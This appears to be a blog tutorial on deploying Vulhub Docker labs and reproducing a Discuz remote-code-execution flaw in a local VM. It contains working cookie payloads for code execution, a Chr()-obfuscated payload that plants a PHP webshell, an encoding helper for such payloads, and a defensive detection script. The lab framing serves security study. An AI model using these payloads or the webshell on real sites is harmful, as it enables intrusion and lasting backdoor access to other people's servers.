Fading Coder

One Final Commit for the Last Sprint

Deploying Vulhub Security Environments and Demonstrating Discuz Code Execution

Tech May 19 1

Environment Configuration

Vulhub offers a streamlined platform for security professionals to reproduce vulnerabilities using Docker containers. Each environment ships as a docker-compose project, so there is no manual setup of the vulnerable service and its dependencies, and researchers can focus on analysing the vulnerability itself.

System Requirements:

  • Host Machine: Windows 10
  • Guest VM: CentOS 7 (IP: 192.168.1.13, Network Adapter: NAT)

Container Runtime Setup

1. Install Docker Engine

Retrieve and execute the installation script configured with an Alibaba Cloud mirror:

curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun

2. Install Docker Compose

Select one of the following installation methods:

Method A (Binary Installation): Download the latest Linux binary (docker-compose-Linux-x86_64) from the project's releases, move it to /usr/local/bin, and apply executable permissions:

mv docker-compose-Linux-x86_64 /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
docker-compose version

Method B (Python pip): Install via pip after ensuring the EPEL repository and pip itself are present:

yum -y install epel-release python-pip
pip install docker-compose
pip --version

Note: If pip times out during installation, point it at a package index closer to your network (see Pip Timeout Errors under Common Issues).

3. Deploy Vulhub Repository

Choose between downloading a release package or cloning the Git repository:

Git Clone

yum install -y git
git clone https://github.com/vulhub/vulhub.git

Archive Extraction

mkdir vulhub && cd vulhub
unzip master.zip

4. Accelerate Image Pulling (Optional)

Configure daemon.json to use the AliCloud container mirror accelerator (replace your-accelerator-url with the accelerator address assigned to your account):

sudo mkdir -p /etc/docker
echo '{"registry-mirrors": ["your-accelerator-url"]}' | sudo tee /etc/docker/daemon.json
sudo systemctl daemon-reload
sudo systemctl restart docker

Accessing Vulnerability Instances

Containers run on a private Docker bridge network inside the virtual machine, so the physical host has no route to them by default. To reach the services directly, add a static route on the host that forwards traffic destined for the Docker bridge subnet to the VM's address.

Route Configuration

  1. Identify Container IP: Determine the private IP assigned to the vulnerable container.

    docker inspect <container_id> | grep IPAddress
    # Example Output: "IPAddress": "172.18.0.3"

  2. Disable Firewall on VM: Ensure local firewall rules do not block incoming connections (the VM is on a NAT adapter, so it remains unreachable from outside the host).

    systemctl stop firewalld.service

  3. Add Static Route on Host: Open Command Prompt as Administrator on Windows and add a persistent route for the Docker bridge subnet via the VM's address.

    route add -p 172.18.0.0 mask 255.255.0.0 192.168.1.13
    route print

Vulnerability Reproduction

This section demonstrates the exploitation of the Discuz vulnerability (wooyun-2010-080723), in which request-supplied GLOBALS keys bypass the application's variable handling and overwrite internal variables, leading to code execution.

Deployment

Navigate to the specific environment directory within the repository:

cd vulhub/discuz/wooyun-2010-080723/

Optionally modify docker-compose.yml to adjust exposed ports or default credentials.

Initialize the environment:

docker-compose up -d

Check the output of docker-compose ps (or docker ps) to verify the published port mapping (e.g., 8080->80/tcp).

Exploitation Steps

Database Initialization

Access the installation wizard at http://<IP>:<Port>/install/. Use the following configuration:

  • Database Host: db
  • Database Name: discuz
  • User: root
  • Password: root

Complete the initial setup by skipping contact information input. This redirects to the forum homepage.

Remote Code Execution

Capture HTTP requests using a proxy tool (e.g., Burp Suite). Navigate to a thread post to generate traffic, then modify the Cookie header with the following payload. The cookie names are imported into the global scope, overwriting the cached smilies search and replace arrays; because the injected search pattern carries the /e modifier, preg_replace() evaluates the replacement entry as PHP:

GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1
Host: 172.18.0.3
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
... (remaining headers) ...

Sending this request will render the phpinfo() output, confirming code injection capability.

Establish Persistence

Inject a webshell by modifying the cookie values to write arbitrary PHP content. The target file is x.php with a POST parameter key of pwd.

Payload structure:

GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(80).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))

Accessing http://<IP>:<Port>/x.php and sending PHP code in the pwd POST parameter activates the shell.
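As an added defensive example (not part of the original post), the following Python scans request records for the markers of the technique shown in the last two sections: a request-supplied key named GLOBALS[...], a regex value carrying the /e modifier, and Chr()-concatenated or eval()-based PHP in a cookie. The sample requests, rule names and the scan() helper are constructed here for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample requests (method, path, Cookie header); not captured traffic.
SAMPLE_REQUESTS = [
    ("GET", "/viewthread.php?tid=13&extra=page%3D1",
     "GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; "
     "GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();"),
    ("GET", "/viewthread.php?tid=13",
     "GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117));"),
    ("GET", "/forumdisplay.php?fid=2", "cdb_sid=abc123; cdb_oldtopics=D13D"),
    ("POST", "/viewthread.php?tid=13", "cdb_sid=abc123"),
]

# A request parameter named GLOBALS (or GLOBALS[...]) is the tell-tale of an attempt
# to overwrite PHP globals through register_globals-style variable import. $GLOBALS is
# case-sensitive in PHP, so this rule is too.
GLOBALS_KEY = re.compile(r"(^|[;&]\s*)GLOBALS(\[|=|$)")
# A regex value ending in a modifier set containing 'e' makes preg_replace() evaluate
# the replacement string as PHP.
E_MODIFIER = re.compile(r"=/[^;&]*/[a-zA-Z]*e[a-zA-Z]*\s*(?=[;&]|$)")
# Chr()-concatenation or eval( are typical obfuscated PHP; function names are
# case-insensitive in PHP, so match them case-insensitively.
OBFUSCATED_PHP = re.compile(r"Chr\(\d+\)\.|eval\(", re.IGNORECASE)

def findings_for(method, path, cookie):
    """Return the detection reasons for one request (empty list if it looks benign)."""
    query = path.partition("?")[2]
    findings = []
    for where, raw in (("query string", query), ("Cookie", cookie)):
        text = unquote(raw)  # values may arrive URL-encoded
        if GLOBALS_KEY.search(text):
            findings.append(f"GLOBALS override in {where}")
        if E_MODIFIER.search(text):
            findings.append(f"regex /e modifier in {where}")
        if OBFUSCATED_PHP.search(text):
            findings.append(f"obfuscated PHP in {where}")
    return findings

def scan(requests):
    """Map 'METHOD path' to its findings for every request that triggers a rule."""
    report = {}
    for method, path, cookie in requests:
        hits = findings_for(method, path, cookie)
        if hits:
            report[f"{method} {path}"] = hits
    return report

if __name__ == "__main__":
    for request, reasons in scan(SAMPLE_REQUESTS).items():
        print(request, "->", "; ".join(reasons))
```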

Utility Scripts

A small conversion utility converts text payloads to and from the Chr() character sequences used in the obfuscated cookie payload above.

import re

# Converts a "Chr(n).Chr(n)..." sequence back into the plaintext it encodes
def string_from_ascii(encoded_chars):
    decoded = "".join(chr(int(c)) for c in re.findall(r"\d+", encoded_chars))
    print(decoded)
    return decoded

# Converts plaintext into the PHP Chr() concatenation format used in the cookie payload.
# Joining with "." avoids a trailing concatenation operator, which would be a PHP syntax error.
def ascii_from_string(text):
    ascii_sequence = ".".join("Chr(%d)" % ord(char) for char in text)
    print(ascii_sequence)
    return ascii_sequence

# Example usage
encoded_payload = "Chr(102).Chr(112).Chr(117)..."
string_from_ascii(encoded_payload)

decoded_payload = "fputs(fopen('x.php','w'),'<?php @eval($_POST[pwd])?>');"
ascii_from_string(decoded_payload)

Maintenance and Troubleshooting

Cleanup

Remove all resources associated with a specific environment by executing the down command within the project directory:

docker-compose down

Force removal of images and volumes if necessary:

docker-compose down --rmi all -v

Verify running containers are stopped:

docker ps

Common Issues

DNS Resolution Failure: If curl reports "Could not resolve host", add a reachable nameserver to the resolver configuration:

vim /etc/resolv.conf
# add the line:
nameserver 223.5.5.5

Docker Daemon Unreachable: Check the service status and start it manually:

service docker status
service docker start

Pip Timeout Errors: Switch the pip index URL to a domestic mirror by creating ~/.pip/pip.conf:

mkdir ~/.pip/
cd ~/.pip/
vim pip.conf

with the following content:

[global]
index-url=https://mirrors.aliyun.com/pypi/simple/

Static Route Removal: To delete the persistent route added earlier, run on the Windows host:

route delete 172.18.0.0
